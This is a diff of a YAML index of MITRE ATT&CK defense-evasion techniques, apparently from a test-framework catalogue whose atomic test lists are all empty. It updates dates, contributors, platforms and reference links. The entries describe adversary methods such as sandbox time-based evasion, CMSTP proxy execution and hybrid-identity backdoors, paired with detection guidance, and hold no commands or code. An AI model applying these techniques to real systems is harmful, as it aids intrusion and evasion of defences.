+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
